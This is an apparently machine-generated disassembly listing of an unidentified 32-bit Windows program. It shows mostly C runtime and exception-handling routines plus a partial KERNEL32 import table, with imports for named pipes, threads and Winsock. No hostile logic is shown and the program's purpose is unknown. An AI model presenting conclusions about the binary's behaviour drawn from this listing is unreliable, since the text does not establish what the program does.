; [0000000C BYTES: COLLAPSED FUNCTION __FillZeroMan. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __IsZeroMan. PRESS KEYPAD "+" TO EXPAND]
; [0000008D BYTES: COLLAPSED FUNCTION __ShrMan. PRESS KEYPAD "+" TO EXPAND]
; [0000016C BYTES: COLLAPSED FUNCTION __ld12cvt. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4187FF proc near ; CODE XREF: sub_41882B+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_424290
push [esp+4+arg_4]
push [esp+8+arg_0]
call __ld12cvt
add esp, 0Ch
retn
sub_4187FF endp
; =============== S U B R O U T I N E =======================================
sub_418815 proc near ; CODE XREF: sub_418858+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_4242A8
push [esp+4+arg_4]
push [esp+8+arg_0]
call __ld12cvt
add esp, 0Ch
retn
sub_418815 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41882B proc near ; CODE XREF: __fassign+12�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call ___strgtold12
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_4187FF
add esp, 24h
leave
retn
sub_41882B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418858 proc near ; CODE XREF: __fassign+2D�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call ___strgtold12
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_418815
add esp, 24h
leave
retn
sub_418858 endp
; [00000077 BYTES: COLLAPSED FUNCTION __fptostr. PRESS KEYPAD "+" TO EXPAND]
; [00000064 BYTES: COLLAPSED FUNCTION __fltout. PRESS KEYPAD "+" TO EXPAND]
; [000000B6 BYTES: COLLAPSED FUNCTION ___dtold. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 2
call __amsg_exit
pop ecx
retn
; [00000046 BYTES: COLLAPSED FUNCTION __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_418A65 proc near ; DATA XREF: .data:0041E01C�o
push offset ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z ; lpTopLevelExceptionFilter
call ds:SetUnhandledExceptionFilter ; SetUnhandledExceptionFilter
mov lpTopLevelExceptionFilter, eax
retn
sub_418A65 endp
; =============== S U B R O U T I N E =======================================
sub_418A76 proc near ; DATA XREF: .data:0041E034�o
push lpTopLevelExceptionFilter ; lpTopLevelExceptionFilter
call ds:SetUnhandledExceptionFilter ; SetUnhandledExceptionFilter
retn
sub_418A76 endp
; [0000001C BYTES: COLLAPSED FUNCTION _ValidateRead(void const *,uint). PRESS KEYPAD "+" TO EXPAND]
; [0000001C BYTES: COLLAPSED FUNCTION _ValidateWrite(void *,uint). PRESS KEYPAD "+" TO EXPAND]
; [00000018 BYTES: COLLAPSED FUNCTION _ValidateExecute(int (*)(void)). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000017 BYTES: COLLAPSED CHUNK OF FUNCTION sub_4158EC. PRESS KEYPAD "+" TO EXPAND]
; [00000149 BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; [000000C8 BYTES: COLLAPSED FUNCTION _mbtowc. PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION _isspace. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001F BYTES: COLLAPSED FUNCTION __allshl. PRESS KEYPAD "+" TO EXPAND]
; [0000006E BYTES: COLLAPSED FUNCTION _ungetc. PRESS KEYPAD "+" TO EXPAND]
; [00000067 BYTES: COLLAPSED FUNCTION __dosmaperr. PRESS KEYPAD "+" TO EXPAND]
; [00000095 BYTES: COLLAPSED FUNCTION __alloc_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [00000077 BYTES: COLLAPSED FUNCTION __set_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [0000007A BYTES: COLLAPSED FUNCTION __free_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [0000003D BYTES: COLLAPSED FUNCTION __get_osfhandle. PRESS KEYPAD "+" TO EXPAND]
; [00000057 BYTES: COLLAPSED FUNCTION __commit. PRESS KEYPAD "+" TO EXPAND]
; [000002B9 BYTES: COLLAPSED FUNCTION __sopen. PRESS KEYPAD "+" TO EXPAND]
; [00000015 BYTES: COLLAPSED FUNCTION ___tzset. PRESS KEYPAD "+" TO EXPAND]
; [0000025E BYTES: COLLAPSED FUNCTION __tzset. PRESS KEYPAD "+" TO EXPAND]
; [000001AC BYTES: COLLAPSED FUNCTION __isindst. PRESS KEYPAD "+" TO EXPAND]
; [00000140 BYTES: COLLAPSED FUNCTION _cvtdate. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [00000031 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; [00000089 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
; [0000007D BYTES: COLLAPSED FUNCTION _calloc. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION __fcloseall. PRESS KEYPAD "+" TO EXPAND]
; [00000021 BYTES: COLLAPSED FUNCTION ___addl. PRESS KEYPAD "+" TO EXPAND]
; [0000005E BYTES: COLLAPSED FUNCTION ___add_12. PRESS KEYPAD "+" TO EXPAND]
; [0000002E BYTES: COLLAPSED FUNCTION ___shl_12. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION ___shr_12. PRESS KEYPAD "+" TO EXPAND]
; [000000C7 BYTES: COLLAPSED FUNCTION ___mtold12. PRESS KEYPAD "+" TO EXPAND]
; [000004A1 BYTES: COLLAPSED FUNCTION ___strgtold12. PRESS KEYPAD "+" TO EXPAND]
off_41A038 dd offset loc_419C01 ; DATA XREF: ___strgtold12+63�r
dd offset loc_419C50 ; jump table for switch statement
dd offset loc_419CA7
dd offset loc_419CD1
dd offset loc_419D2C
dd offset loc_419DA3
dd offset loc_419DD9
dd offset loc_419E23
dd offset loc_419E02
dd offset loc_419E87
dd offset loc_419E71
dd offset loc_419E3D
; [00000293 BYTES: COLLAPSED FUNCTION _$I10_OUTPUT. PRESS KEYPAD "+" TO EXPAND]
; [0000012D BYTES: COLLAPSED FUNCTION _raise. PRESS KEYPAD "+" TO EXPAND]
; [00000045 BYTES: COLLAPSED FUNCTION _siglookup. PRESS KEYPAD "+" TO EXPAND]
; [00000146 BYTES: COLLAPSED FUNCTION __chsize. PRESS KEYPAD "+" TO EXPAND]
; [0000007D BYTES: COLLAPSED FUNCTION _getenv. PRESS KEYPAD "+" TO EXPAND]
; [00000220 BYTES: COLLAPSED FUNCTION ___ld12mul. PRESS KEYPAD "+" TO EXPAND]
; [0000007C BYTES: COLLAPSED FUNCTION ___multtenpow12. PRESS KEYPAD "+" TO EXPAND]
; [00000076 BYTES: COLLAPSED FUNCTION __setmode. PRESS KEYPAD "+" TO EXPAND]
; [0000003F BYTES: COLLAPSED FUNCTION __mbsnbicoll. PRESS KEYPAD "+" TO EXPAND]
; [0000006E BYTES: COLLAPSED FUNCTION ___wtomb_environ. PRESS KEYPAD "+" TO EXPAND]
; [0000027D BYTES: COLLAPSED FUNCTION ___crtCompareStringA. PRESS KEYPAD "+" TO EXPAND]
; [00000187 BYTES: COLLAPSED FUNCTION ___crtsetenv. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION _findenv. PRESS KEYPAD "+" TO EXPAND]
; [00000067 BYTES: COLLAPSED FUNCTION _copy_environ. PRESS KEYPAD "+" TO EXPAND]
; [00000073 BYTES: COLLAPSED FUNCTION __mbschr. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION __strdup. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_41AF50 proc near ; CODE XREF: sub_41AF78+3�p
; sub_41AFFE+6�j ...
push esi
mov esi, ecx
push 1
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41C83C
call sub_40317D
mov ecx, esi
pop esi
jmp sub_41B2A6
sub_41AF50 endp
; [0000000D BYTES: COLLAPSED FUNCTION sub_41AF6B. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_41AF78(void *Memory, char)
sub_41AF78 proc near ; DATA XREF: .rdata:off_41C83C�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_41AF50
test [esp+4+arg_0], 1
jz short loc_41AF8E
push esi ; Memory
call ??3@YAXPAX@Z ; operator delete(void *)
pop ecx
loc_41AF8E: ; CODE XREF: sub_41AF78+D�j
mov eax, esi
pop esi
retn 4
sub_41AF78 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AF94 proc near ; CODE XREF: sub_41B009+29�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
mov eax, offset loc_41B35E
call __EH_prolog
push ecx
push ecx
push esi
lea eax, [ebp+var_10]
mov esi, ecx
push eax
mov [ebp+var_14], esi
mov [ebp+var_10], offset dword_41C858
call ??0exception@@QAE@ABQBD@Z ; exception::exception(char const * const &)
push [ebp+arg_0]
and [ebp+var_4], 0
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41C83C
call sub_402CA1
mov ecx, [ebp+var_C]
mov dword ptr [esi], offset off_41C84C
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_41AF94 endp
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_41AFE2(void *Memory, char)
sub_41AFE2 proc near ; DATA XREF: .rdata:off_41C84C�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_41AFFE
test [esp+4+arg_0], 1
jz short loc_41AFF8
push esi ; Memory
call ??3@YAXPAX@Z ; operator delete(void *)
pop ecx
loc_41AFF8: ; CODE XREF: sub_41AFE2+D�j
mov eax, esi
pop esi
retn 4
sub_41AFE2 endp
; =============== S U B R O U T I N E =======================================
sub_41AFFE proc near ; CODE XREF: sub_41AFE2+3�p
; DATA XREF: .rdata:0041CB94�o
mov dword ptr [ecx], offset off_41C84C
jmp sub_41AF50
sub_41AFFE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B009 proc near ; CODE XREF: sub_402EB2+16�p
; sub_403257+13�p
var_3C = byte ptr -3Ch
var_20 = byte ptr -20h
var_D = byte ptr -0Dh
var_4 = dword ptr -4
mov eax, offset loc_41B370
call __EH_prolog
sub esp, 30h
lea eax, [ebp+var_D]
push eax
push offset aInvalidStringP ; "invalid string position"
lea ecx, [ebp+var_20]
call sub_402CD6
and [ebp+var_4], 0
lea eax, [ebp+var_20]
push eax
lea ecx, [ebp+var_3C]
call sub_41AF94
push offset dword_41CB90
lea eax, [ebp+var_3C]
push eax
call __CxxThrowException@8 ; _CxxThrowException(x,x)
int 3 ; Trap to Debugger
sub_41B009 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B046 proc near ; CODE XREF: sub_41B110+29�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
mov eax, offset loc_41B382
call __EH_prolog
push ecx
push ecx
push esi
lea eax, [ebp+var_10]
mov esi, ecx
push eax
mov [ebp+var_14], esi
mov [ebp+var_10], offset dword_41C858
call ??0exception@@QAE@ABQBD@Z ; exception::exception(char const * const &)
push [ebp+arg_0]
and [ebp+var_4], 0
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41C83C
call sub_402CA1
mov ecx, [ebp+var_C]
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_41B046 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B08E proc near ; CODE XREF: sub_41B0F8+7�p
; sub_41B154+7�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
mov eax, offset loc_41B394
call __EH_prolog
push ecx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, ecx
push edi
mov [ebp+var_10], esi
call ??0exception@@QAE@ABV0@@Z ; exception::exception(exception const &)
and [ebp+var_4], 0
add edi, 0Ch
push edi
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41C83C
call sub_402CA1
mov ecx, [ebp+var_C]
pop edi
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_41B08E endp
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_41B0D1(void *Memory, char)
sub_41B0D1 proc near ; DATA XREF: .rdata:off_41C878�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_41B0ED
test [esp+4+arg_0], 1
jz short loc_41B0E7
push esi ; Memory
call ??3@YAXPAX@Z ; operator delete(void *)
pop ecx
loc_41B0E7: ; CODE XREF: sub_41B0D1+D�j
mov eax, esi
pop esi
retn 4
sub_41B0D1 endp
; =============== S U B R O U T I N E =======================================
sub_41B0ED proc near ; CODE XREF: sub_41B0D1+3�p
; DATA XREF: .rdata:0041CC3C�o
mov dword ptr [ecx], offset off_41C878
jmp sub_41AF50
sub_41B0ED endp
; =============== S U B R O U T I N E =======================================
sub_41B0F8 proc near ; CODE XREF: sub_41B16C+46�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_41B08E
mov dword ptr [esi], offset off_41C84C
mov eax, esi
pop esi
retn 4
sub_41B0F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B110 proc near ; CODE XREF: sub_402D44+19�p
; sub_402E2B+19�p ...
var_3C = dword ptr -3Ch
var_20 = byte ptr -20h
var_D = byte ptr -0Dh
var_4 = dword ptr -4
mov eax, offset loc_41B3A6
call __EH_prolog
sub esp, 30h
lea eax, [ebp+var_D]
push eax
push offset aStringTooLong ; "string too long"
lea ecx, [ebp+var_20]
call sub_402CD6
and [ebp+var_4], 0
lea eax, [ebp+var_20]
push eax
lea ecx, [ebp+var_3C]
call sub_41B046
push offset dword_41CC38
lea eax, [ebp+var_3C]
push eax
mov [ebp+var_3C], offset off_41C878
call __CxxThrowException@8 ; _CxxThrowException(x,x)
int 3 ; Trap to Debugger
sub_41B110 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B154 proc near ; CODE XREF: sub_41B16C+28�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_41B08E
mov dword ptr [esi], offset off_41C878
mov eax, esi
pop esi
retn 4
sub_41B154 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B16C proc near ; DATA XREF: .rdata:0041C844�o
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_41B08E
push offset dword_41CC78
lea eax, [ebp+var_1C]
push eax
call __CxxThrowException@8 ; _CxxThrowException(x,x)
int 3 ; Trap to Debugger
loc_41B18A: ; DATA XREF: .rdata:0041C880�o
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_41B154
push offset dword_41CC38
lea eax, [ebp+var_1C]
push eax
call __CxxThrowException@8 ; _CxxThrowException(x,x)
int 3 ; Trap to Debugger
loc_41B1A8: ; DATA XREF: .rdata:0041C854�o
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_41B0F8
push offset dword_41CB90
lea eax, [ebp+var_1C]
push eax
call __CxxThrowException@8 ; _CxxThrowException(x,x)
int 3 ; Trap to Debugger
sub_41B16C endp ; sp-analysis failed
; [00000006 BYTES: COLLAPSED FUNCTION __WSAFDIsSet. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]
; [00000015 BYTES: COLLAPSED FUNCTION type_info::~type_info(void). PRESS KEYPAD "+" TO EXPAND]
; [0000001C BYTES: COLLAPSED FUNCTION type_info::`scalar deleting destructor'(uint). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_41B203(void *Memory, char)
sub_41B203 proc near ; DATA XREF: .rdata:off_41C8A0�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_41B2A6
test [esp+4+arg_0], 1
jz short loc_41B219
push esi ; Memory
call ??3@YAXPAX@Z ; operator delete(void *)
pop ecx
loc_41B219: ; CODE XREF: sub_41B203+D�j
mov eax, esi
pop esi
retn 4
sub_41B203 endp
; [0000003D BYTES: COLLAPSED FUNCTION exception::exception(char const * const &). PRESS KEYPAD "+" TO EXPAND]
; [0000004A BYTES: COLLAPSED FUNCTION exception::exception(exception const &). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_41B2A6 proc near ; CODE XREF: sub_41AF50+16�j
; sub_41B203+3�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_41C8A0
jz short locret_41B2BB
push dword ptr [ecx+4] ; Memory
call ??3@YAXPAX@Z ; operator delete(void *)
pop ecx
locret_41B2BB: ; CODE XREF: sub_41B2A6+A�j
retn
sub_41B2A6 endp
; [0000000D BYTES: COLLAPSED FUNCTION unknown_libname_9. PRESS KEYPAD "+" TO EXPAND]
; [0000003A BYTES: COLLAPSED FUNCTION _CxxThrowException(x,x). PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
sub_41B304 proc near ; DATA XREF: .rdata:stru_41CA50�o
lea ecx, [ebp-20h]
call sub_402D03
retn
sub_41B304 endp
; =============== S U B R O U T I N E =======================================
sub_41B30D proc near ; DATA XREF: .rdata:stru_41CA50�o
mov eax, [ebp-3Ch]
and eax, 1
test eax, eax
jz locret_41B323
mov ecx, [ebp+8]
call sub_402D03
locret_41B323: ; CODE XREF: sub_41B30D+8�j
retn
sub_41B30D endp
; ---------------------------------------------------------------------------
loc_41B324: ; DATA XREF: sub_4026C9�o
mov eax, offset stru_41CA50
jmp ___CxxFrameHandler
; =============== S U B R O U T I N E =======================================
sub_41B32E proc near ; DATA XREF: .rdata:stru_41CA80�o
lea ecx, [ebp+14h]
call sub_402D03
retn
sub_41B32E endp
; =============== S U B R O U T I N E =======================================
sub_41B337 proc near ; DATA XREF: .rdata:stru_41CA80�o
lea ecx, [ebp-24h]
call sub_402D03
retn
sub_41B337 endp
; =============== S U B R O U T I N E =======================================
sub_41B340 proc near ; DATA XREF: sub_40288F�o
mov eax, offset stru_41CA80
jmp ___CxxFrameHandler
sub_41B340 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_41B34C proc near ; DATA XREF: sub_40334A�o
mov eax, offset stru_41CAB0
jmp ___CxxFrameHandler
sub_41B34C endp
; =============== S U B R O U T I N E =======================================
sub_41B356 proc near ; DATA XREF: .rdata:stru_41CB08�o
mov ecx, [ebp-14h]
jmp sub_41B2A6
sub_41B356 endp
; ---------------------------------------------------------------------------
loc_41B35E: ; DATA XREF: sub_41AF94�o
mov eax, offset stru_41CB10
jmp ___CxxFrameHandler
; =============== S U B R O U T I N E =======================================
sub_41B368 proc near ; DATA XREF: .rdata:stru_41CBA0�o
lea ecx, [ebp-20h]
jmp sub_402D03
sub_41B368 endp
; ---------------------------------------------------------------------------
loc_41B370: ; DATA XREF: sub_41B009�o
mov eax, offset stru_41CBA8
jmp ___CxxFrameHandler
; =============== S U B R O U T I N E =======================================
sub_41B37A proc near ; DATA XREF: .rdata:stru_41CBC4�o
mov ecx, [ebp-14h]
jmp sub_41B2A6
sub_41B37A endp
; ---------------------------------------------------------------------------
loc_41B382: ; DATA XREF: sub_41B046�o
mov eax, offset stru_41CBCC
jmp ___CxxFrameHandler
; =============== S U B R O U T I N E =======================================
sub_41B38C proc near ; DATA XREF: .rdata:stru_41CBE8�o
mov ecx, [ebp-10h]
jmp sub_41B2A6
sub_41B38C endp
; ---------------------------------------------------------------------------
loc_41B394: ; DATA XREF: sub_41B08E�o
mov eax, offset stru_41CBF0
jmp ___CxxFrameHandler
; =============== S U B R O U T I N E =======================================
sub_41B39E proc near ; DATA XREF: .rdata:stru_41CC48�o
lea ecx, [ebp-20h]
jmp sub_402D03
sub_41B39E endp
; ---------------------------------------------------------------------------
loc_41B3A6: ; DATA XREF: sub_41B110�o
mov eax, offset stru_41CC50
jmp ___CxxFrameHandler
; ---------------------------------------------------------------------------
dd 14h dup(?)
_text ends
; Section 2. (virtual address 0001C000)
; Virtual size : 0000155C ( 5468.)
; Section size in file : 0000155C ( 5468.)
; Offset to raw data for section: 0001AA00
; Flags 40000040: Data Readable
; Alignment : default
;
; Imports from KERNEL32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; DWORD __stdcall GetFileAttributesA(LPCSTR lpFileName)
extrn GetFileAttributesA:dword ; CODE XREF: sub_408651+143�p
; WinMain(x,x,x,x)+203�p
; DATA XREF: ...
; BOOL __stdcall SetEnvironmentVariableA(LPCSTR lpName, LPCSTR lpValue)
extrn SetEnvironmentVariableA:dword ; CODE XREF: ___crtsetenv+173�p
; DATA XREF: ___crtsetenv+173�r
; int __stdcall CompareStringW(LCID Locale, DWORD dwCmpFlags, LPCWSTR lpString1, int cchCount1, LPCWSTR lpString2, int cchCount2)
extrn CompareStringW:dword ; CODE XREF: ___crtCompareStringA+3E�p
; ___crtCompareStringA+261�p
; DATA XREF: ...
; int __stdcall CompareStringA(LCID Locale, DWORD dwCmpFlags, LPCSTR lpString1, int cchCount1, LPCSTR lpString2, int cchCount2)
extrn CompareStringA:dword ; CODE XREF: ___crtCompareStringA+5B�p
; ___crtCompareStringA+B9�p
; DATA XREF: ...
; BOOL __stdcall SetEndOfFile(HANDLE hFile)
extrn SetEndOfFile:dword ; CODE XREF: __chsize+F9�p
; DATA XREF: __chsize+F9�r
; BOOL __stdcall FlushFileBuffers(HANDLE hFile)
extrn FlushFileBuffers:dword ; CODE XREF: __commit+2C�p
; DATA XREF: __commit+2C�r
; BOOL __stdcall SetStdHandle(DWORD nStdHandle, HANDLE hHandle)
extrn SetStdHandle:dword ; CODE XREF: __set_osfhnd:loc_418F09�p
; __free_osfhnd:loc_418F83�p
; DATA XREF: ...
; BOOL __stdcall GetStringTypeW(DWORD dwInfoType, LPCWSTR lpSrcStr, int cchSrc, LPWORD lpCharType)
extrn GetStringTypeW:dword ; CODE XREF: ___crtGetStringTypeA+3F�p
; ___crtGetStringTypeA+12D�p
; DATA XREF: ...
; BOOL __stdcall GetStringTypeA(LCID Locale, DWORD dwInfoType, LPCSTR lpSrcStr, int cchSrc, LPWORD lpCharType)
extrn GetStringTypeA:dword ; CODE XREF: ___crtGetStringTypeA+59�p
; ___crtGetStringTypeA+8D�p
; DATA XREF: ...
; BOOL __stdcall IsBadCodePtr(FARPROC lpfn)
extrn IsBadCodePtr:dword ; CODE XREF: _ValidateExecute(int (*)(void))+8�p
; DATA XREF: _ValidateExecute(int (*)(void))+8�r
; BOOL __stdcall IsBadReadPtr(const void *lp, UINT_PTR ucb)
extrn IsBadReadPtr:dword ; CODE XREF: _ValidateRead(void const *,uint)+C�p
; DATA XREF: _ValidateRead(void const *,uint)+C�r
; LPTOP_LEVEL_EXCEPTION_FILTER __stdcall SetUnhandledExceptionFilter(LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter)
extrn SetUnhandledExceptionFilter:dword ; CODE XREF: sub_418A65+5�p
; sub_418A76+6�p
; DATA XREF: ...
; LPWCH __stdcall GetEnvironmentStringsW()
extrn GetEnvironmentStringsW:dword
; CODE XREF: ___crtGetEnvironmentStringsA+1B�p
; ___crtGetEnvironmentStringsA+5B�p
; DATA XREF: ...
; LPCH __stdcall GetEnvironmentStrings()
extrn GetEnvironmentStrings:dword
; CODE XREF: ___crtGetEnvironmentStringsA:loc_417C88�p
; ___crtGetEnvironmentStringsA+E1�p
; DATA XREF: ...
; BOOL __stdcall FreeEnvironmentStringsW(LPWCH)
extrn FreeEnvironmentStringsW:dword
; CODE XREF: ___crtGetEnvironmentStringsA+CE�p
; DATA XREF: ___crtGetEnvironmentStringsA+CE�r
; BOOL __stdcall FreeEnvironmentStringsA(LPCH)
extrn FreeEnvironmentStringsA:dword
; CODE XREF: ___crtGetEnvironmentStringsA+11F�p
; DATA XREF: ___crtGetEnvironmentStringsA+11F�r
; LONG __stdcall UnhandledExceptionFilter(struct _EXCEPTION_POINTERS *ExceptionInfo)
extrn UnhandledExceptionFilter:dword ; CODE XREF: __XcptFilter+138�p
; DATA XREF: __XcptFilter+138�r
; UINT __stdcall GetOEMCP()
extrn GetOEMCP:dword ; DATA XREF: _getSystemCP+1A�r
; UINT __stdcall GetACP()
extrn GetACP:dword ; DATA XREF: _getSystemCP+2F�r
; BOOL __stdcall GetCPInfo(UINT CodePage, LPCPINFO lpCPInfo)
extrn GetCPInfo:dword ; CODE XREF: __setmbcp+48�p
; _setSBUpLow+14�p ...
; int __stdcall LCMapStringW(LCID Locale, DWORD dwMapFlags, LPCWSTR lpSrcStr, int cchSrc, LPWSTR lpDestStr, int cchDest)
extrn LCMapStringW:dword ; CODE XREF: ___crtLCMapStringA+42�p
; ___crtLCMapStringA+14D�p ...
; int __stdcall MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar)
extrn MultiByteToWideChar:dword ; CODE XREF: sub_401000+68�p
; sub_40110C+68�p ...
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: sub_40110C+B2�p
; sub_4016C0+434�p ...
; BOOL __stdcall ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped)
extrn ReadFile:dword ; CODE XREF: sub_4016C0+1EC�p
; __read+84�p ...
; BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped)
extrn WriteFile:dword ; CODE XREF: sub_4016C0+196�p
; sub_408651+C3�p ...
; BOOL __stdcall TransactNamedPipe(HANDLE hNamedPipe, LPVOID lpInBuffer, DWORD nInBufferSize, LPVOID lpOutBuffer, DWORD nOutBufferSize, LPDWORD lpBytesRead, LPOVERLAPPED lpOverlapped)
extrn TransactNamedPipe:dword ; CODE XREF: sub_4016C0+134�p
; DATA XREF: sub_4016C0+134�r
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword ; CODE XREF: sub_4016C0+D9�p
; sub_4016C0+167�p ...
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
extrn CreateFileA:dword ; CODE XREF: sub_4016C0+6A�p
; sub_4084A5+48�p ...
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize)
extrn GetModuleFileNameA:dword ; CODE XREF: sub_404515+2C�p
; sub_404F31+5B�p ...
; void __stdcall ExitThread(DWORD dwExitCode)
extrn ExitThread:dword ; CODE XREF: StartAddress+D6�p
; StartAddress+1ED�p ...
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: sub_404F31:loc_4050A9�p
; sub_404F31:loc_40522A�p ...
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
extrn CreateThread:dword ; CODE XREF: sub_404F31+137�p
; sub_404F31+2B8�p ...
; void __stdcall LeaveCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn LeaveCriticalSection:dword ; CODE XREF: sub_405759+1D6�p
; DATA XREF: sub_405759+1D6�r
; void __stdcall EnterCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn EnterCriticalSection:dword ; CODE XREF: sub_405759+14B�p
; DATA XREF: sub_405759+14B�r
; DWORD __stdcall GetTickCount()
extrn GetTickCount:dword ; CODE XREF: sub_405759+3E�p
; sub_40634F+4B�p ...
; BOOL __stdcall InitializeCriticalSectionAndSpinCount(LPCRITICAL_SECTION lpCriticalSection, DWORD dwSpinCount)
extrn InitializeCriticalSectionAndSpinCount:dword
; CODE XREF: sub_405A2E+83�p
; DATA XREF: sub_405A2E+83�r
; void __stdcall DeleteCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
